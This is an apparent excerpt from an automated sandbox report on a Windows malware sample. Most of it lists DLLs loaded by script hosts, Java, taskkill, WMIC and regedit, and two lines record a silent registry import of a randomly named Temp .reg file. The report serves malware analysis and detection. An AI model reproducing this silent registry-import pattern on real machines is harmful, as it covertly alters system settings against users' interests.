Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\regedit.exe regedit.exe /s C:\Users\user\AppData\Local\Temp\XGkhOkmDsC474469576599115670.reg
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\regedit.exe "C:\Windows\system32\regedit.exe" /s C:\Users\user\AppData\Local\Temp\XGkhOkmDsC474469576599115670.reg

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: opengl32.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Section loaded: glu32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: ifsutil.dll
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: devobj.dll
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: ifsutil.dll
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: devobj.dll
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: pcacli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\regedit.exe	Section loaded: authz.dll
Source: C:\Windows\SysWOW64\regedit.exe	Section loaded: aclui.dll
Source: C:\Windows\SysWOW64\regedit.exe	Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\regedit.exe	Section loaded: clb.dll
Source: C:\Windows\SysWOW64\regedit.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\regedit.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\regedit.exe	Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
